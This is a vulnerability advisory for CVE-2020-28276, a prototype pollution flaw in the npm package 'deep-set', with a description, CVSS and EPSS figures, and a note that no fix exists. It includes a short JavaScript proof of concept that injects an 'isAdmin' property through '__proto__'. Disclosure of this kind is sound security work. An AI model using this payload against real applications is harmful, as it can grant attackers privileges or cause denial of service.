CVE-2020-28276
Prototype pollution vulnerability in 'deep-set'
Description
The NPM module 'deep-set' can be abused by Prototype Pollution vulnerability since the function `deepSet()` does not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution. ### PoC ```js var deepSet = require('deep-set') var obj = {'1':'2'} console.log(obj.isAdmin); deepSet(obj, '__proto__.isAdmin', 'true') console.log(obj.isAdmin); ```
How to fix CVE-2020-28276
No fixed version has been published yet. Mitigate by removing the affected package or applying upstream guidance from the references below.
- —no fix listed
Is CVE-2020-28276 being exploited?
Low — EPSS is 2.9%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- >= 1.0.0, <= 1.0.1
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |